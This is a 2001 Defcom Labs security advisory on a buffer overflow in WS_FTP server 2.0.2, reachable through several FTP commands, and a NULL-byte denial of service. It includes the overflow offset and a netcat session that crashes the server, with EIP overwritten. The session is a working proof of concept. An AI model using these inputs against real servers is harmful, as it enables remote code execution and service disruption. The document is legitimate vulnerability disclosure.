From: andreas junestam (andreas.junestam@defcom.com)
Date: Thu Jul 26 2001 - 07:25:13 CDT


    ======================================================================
                      Defcom Labs Advisory def-2001-28

             WS_FTP server 2.0.2 Buffer Overflow and possible DOS

    Author: Andreas Junestam <andreas@defcom.com>
    Co-Author: Janne Sarendal <janne@defcom.com>
    Release Date: 2001-07-26
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    WS_FTP server 2.0.2 contains a buffer overflow which affects the
    following commands:
    * DELE
    * MDTM
    * MLST
    * MKD
    * RMD
    * RNFR
    * RNTO
    * SIZE
    * STAT
    * XMKD
    * XRMD
    This buffer overflow gives an attacker the ability to run code on
    the target with SYSTEM RIGHTS, because the server runs as a service
    by default. Note: the overflow is only reachable when logged in as
    an anonymous user; it does not trigger for an ordinary account.

    The server also contains an easy-to-trigger DOS.

    ------------------------=[Affected Systems]=--------------------------
    - WS_FTP server 2.0.2; other versions have not been tested

    ----------------------=[Detailed Description]=------------------------
    * Command Buffer Overrun
      All the commands listed above seem to share the same argument
      parsing code, which suffers from a stack buffer overflow. Sending
      one of these commands with an argument longer than 478 bytes
      (474 bytes of filler followed by a 4-byte new return address)
      overflows the buffer and overwrites the saved return address, so
      EIP is loaded with attacker-controlled data (the crash below shows
      both EBP and EIP set to 0x41414141). A proof-of-concept exploit is
      attached to the advisory; it works against WS_FTP server 2.0.2
      running on WIN2K (Professional and Server, any SP).

      C:\tools\web>nc -nvv 127.0.0.1 21
      (UNKNOWN) [127.0.0.1] 21 (?) open
      220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      220-Tue Jun 19 14:00:21 2001
      220-30 days remaining on evaluation.
      220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      user ftp
      331 Password required
      pass ftp
      230 user logged in
      DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

      Access violation - code c0000005 (first chance)
      eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
      edi=77fca3e0
      eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
      na po nc
      cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
      efl=00010246

    * Possible DOS
      By sending a couple of NULL (0x00) characters on the control
      connection, the WS_FTP Server spikes to 100% CPU.

    ---------------------------=[Workaround]=-----------------------------

    Download the new version from:
    http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

    -----------------------------=[Exploit]=------------------------------
    See attached file, ws_ftp.pl

    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the vendor's attention on the 18th of
    June, 2001. A patch has been released.

    ======================================================================
                This release was brought to you by Defcom Labs

                  labs@defcom.com www.defcom.com
    ======================================================================